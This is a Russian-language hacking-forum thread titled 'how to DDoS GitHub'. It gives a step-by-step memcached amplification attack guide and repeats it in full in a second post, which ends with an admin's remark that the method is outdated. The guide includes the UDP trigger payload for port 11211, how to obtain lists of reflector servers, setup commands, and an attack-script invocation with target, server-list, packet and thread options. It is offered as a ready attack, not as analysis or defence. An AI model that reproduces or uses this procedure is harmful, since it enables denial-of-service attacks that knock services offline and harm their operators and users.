DDOS как заддосить гитхаб

  • Автор темы CypherZ
  • Дата начала
  • Просмотров 6628 Просмотров
  • Внимание! В разделе большое количество не проверенных программ. Мы не рекомендуем использовать их на основном ПК, без предварительной проверки.

CypherZ

Новорег
5
0
5 Фев 2019
Расскажу немного про эту уязвимость и покажу как пользоваться.
Для этого нам понадобится наш любимый Linux. Я юзаю Kali, но вообщем это роли не играет.

Немного предыстории:

Недавно обнаружили новую уязвимость, которая позволяет усиливать атаки. Для того, чтобы совершить атаку достаточно знать ip адреса уязвимых серверов c открытым портом 11211. Таких адресов около 17 тыс. На порт уязвимого сервера отправляется пакет:
Код:

\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
После обработки пакета сервер отвечает большим пакетом до 1mb. Это позволило совершить атаку в 1,3 ТБ/с. Github не справился с атакой, иностранный провайдер тоже, а ведь чтобы запустить такую атаку нужно всего-то пару минут.

Нусс приступим...

Для начало нам нужно найти сервера, для этого мы воспользуемся Для просмотра ссылки Войди или Зарегистрируйся .


ca9bc45dd7c82dc81bd7e.png

Или воспользуемся уже готовым списком, который собрали до нас - Для просмотра ссылки Войди или Зарегистрируйся . Скрипт для атаки написан на python 2.7.
Код:

sudo apt-get install python
Потом устанавливаем нужные библиотеки...

Код:

python -m pip install datetime
python -m pip install scapy
Запускаем программу...

Код:

python namescript.py -T xx.xx.xx.xx -S file.txt -P 100 -Thread 100
T - Цель
S - Файл с уязвимыми серверами
P - Кол-во отправленных пакетов
Thread - Потоки
Ссылка на программу - Для просмотра ссылки Войди или Зарегистрируйся

А также исходники атаки: Для просмотра ссылки Войди или Зарегистрируйся

Полезный сканер для поиска: Для просмотра ссылки Войди или Зарегистрируйся
 

admin

По любому вопросу
Администратор
1,651
1,505
5 Мар 2016
Расскажу немного про эту уязвимость и покажу как пользоваться.
Для этого нам понадобится наш любимый Linux. Я юзаю Kali, но вообщем это роли не играет.

Немного предыстории:

Недавно обнаружили новую уязвимость, которая позволяет усиливать атаки. Для того, чтобы совершить атаку достаточно знать ip адреса уязвимых серверов c открытым портом 11211. Таких адресов около 17 тыс. На порт уязвимого сервера отправляется пакет:
Код:

\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
После обработки пакета сервер отвечает большим пакетом до 1mb. Это позволило совершить атаку в 1,3 ТБ/с. Github не справился с атакой, иностранный провайдер тоже, а ведь чтобы запустить такую атаку нужно всего-то пару минут.

Нусс приступим...

Для начало нам нужно найти сервера, для этого мы воспользуемся Для просмотра ссылки Войди или Зарегистрируйся .


Посмотреть вложение 3785
Или воспользуемся уже готовым списком, который собрали до нас - Для просмотра ссылки Войди или Зарегистрируйся . Скрипт для атаки написан на python 2.7.
Код:

sudo apt-get install python
Потом устанавливаем нужные библиотеки...

Код:

python -m pip install datetime
python -m pip install scapy
Запускаем программу...

Код:

python namescript.py -T xx.xx.xx.xx -S file.txt -P 100 -Thread 100
T - Цель
S - Файл с уязвимыми серверами
P - Кол-во отправленных пакетов
Thread - Потоки
Ссылка на программу - Для просмотра ссылки Войди или Зарегистрируйся

А также исходники атаки: Для просмотра ссылки Войди или Зарегистрируйся

Полезный сканер для поиска: Для просмотра ссылки Войди или Зарегистрируйся

Давно уже не актуально.